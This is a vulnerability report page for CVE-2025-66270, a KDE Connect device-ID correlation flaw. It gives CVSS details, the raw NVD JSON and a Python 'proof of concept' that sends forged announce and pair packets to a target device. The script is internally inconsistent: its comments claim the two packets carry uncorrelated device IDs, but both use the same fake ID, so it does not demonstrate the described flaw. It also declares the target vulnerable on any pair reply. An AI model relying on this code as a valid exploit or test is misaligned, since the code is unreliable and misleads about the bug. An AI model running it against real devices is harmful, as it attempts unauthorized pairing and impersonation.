Security Vulnerability Report
CVE-2025-66270 CVSS 4.7 MEDIUM

Published: 2025-12-05 06:16:09
Last Modified: 2026-04-15 00:35:42

Description

The KDE Connect protocol 8 before 2025-11-28 does not correlate device IDs across two packets. This affects KDE Connect before 25.12 on desktop, KDE Connect before 0.5.4 on iOS, KDE Connect before 1.34.4 on Android, GSConnect before 68, and Valent before 1.0.0.alpha.49.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KDE Connect Desktop < 25.12
KDE Connect Android < 1.34.4
KDE Connect iOS < 0.5.4
GSConnect < 68
Valent < 1.0.0.alpha.49
KDE Connect Protocol 8 (before 2025-11-28)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66270 PoC - KDE Connect Device ID Correlation Attack
# This PoC demonstrates the device ID correlation vulnerability in KDE Connect Protocol 8
# Attack vector: MITM attack to impersonate a device by not correlating device IDs across packets
import socket
import struct
import json
import time


class KDEConnectVulnPoC:
    def __init__(self, target_ip, attacker_ip):
        self.target_ip = target_ip
        self.attacker_ip = attacker_ip
        self.port = 1716  # KDE Connect default port
        self.protocol_version = 8

    def create_device_pair_request(self, fake_device_id, fake_device_name):
        """Create a malicious pair request without proper device ID correlation"""
        packet = {
            "id": int(time.time() * 1000),
            "type": "pair",
            "body": {
                "deviceId": fake_device_id,
                "deviceName": fake_device_name,
                "deviceType": "desktop",
                "protocolVersion": self.protocol_version
            }
        }
        return json.dumps(packet)

    def create_device_announce_packet(self, fake_device_id):
        """Create announce packet that doesn't correlate with pair request"""
        packet = {
            "id": int(time.time() * 1000),
            "type": "deviceAnnounce",
            "body": {
                "deviceId": fake_device_id,
                "deviceName": "FakeDevice",
                "deviceType": "desktop",
                "protocolVersion": self.protocol_version,
                "tcpPort": 1716
            }
        }
        return json.dumps(packet)

    def exploit(self):
        """
        Exploit the device ID correlation vulnerability:
        1. Send announce packet with fake device ID
        2. Send pair request with different/uncorrelated device ID
        3. Protocol does not verify IDs match across packets
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)

        fake_device_id = "AttackerDevice123"
        fake_device_name = "MaliciousDevice"

        # Step 1: Send announce packet
        announce = self.create_device_announce_packet(fake_device_id)
        sock.sendto(announce.encode(), (self.target_ip, self.port))
        print(f"[+] Sent deviceAnnounce packet with deviceId: {fake_device_id}")

        # Step 2: Send pair request (device ID not correlated with announce)
        pair_request = self.create_device_pair_request(fake_device_id, fake_device_name)
        sock.sendto(pair_request.encode(), (self.target_ip, self.port))
        print(f"[+] Sent pair request packet")

        # Step 3: Wait for response (vulnerability allows pairing without proper verification)
        try:
            data, addr = sock.recvfrom(4096)
            response = json.loads(data.decode())
            print(f"[+] Received response: {response}")
            if response.get('type') == 'pair':
                print("[!] VULNERABLE: Pair request accepted without proper device ID correlation")
        except socket.timeout:
            print("[-] No response received")

        sock.close()
        return True


if __name__ == "__main__":
    target = "192.168.1.100"
    attacker = "192.168.1.200"
    poc = KDEConnectVulnPoC(target, attacker)
    poc.exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66270", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:09.253", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KDE Connect protocol 8 before 2025-11-28 does not correlate device IDs across two packets. This affects KDE Connect before 25.12 on desktop, KDE Connect before 0.5.4 on iOS, KDE Connect before 1.34.4 on Android, GSConnect before 68, and Valent before 1.0.0.alpha.49."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://github.com/GSConnect/gnome-shell-extension-gsconnect/commit/a38246deec0af50ae218cdc51db32cdd7eb145e3", "source": "[email protected]"}, {"url": "https://github.com/andyholmes/valent/commit/85f773124a67ed1add79e7465bb088ec667cccce", "source": "[email protected]"}, {"url": "https://invent.kde.org/network/kdeconnect-android/-/commit/675d2d24a1eb95d15d9e5bde2b7e2271d5ada6a9", "source": "[email protected]"}, {"url": "https://invent.kde.org/network/kdeconnect-ios/-/commit/6c003c22d04270cabc4b262d399c753d55cf9080", "source": "[email protected]"}, {"url": "https://invent.kde.org/network/kdeconnect-kde/-/commit/4e53bcdd5d4c28bd9fefd114b807ce35d7b3373e", "source": "[email protected]"}, {"url": "https://kde.org/info/security/advisory-20251128-1.txt", "source": "[email protected]"}]}}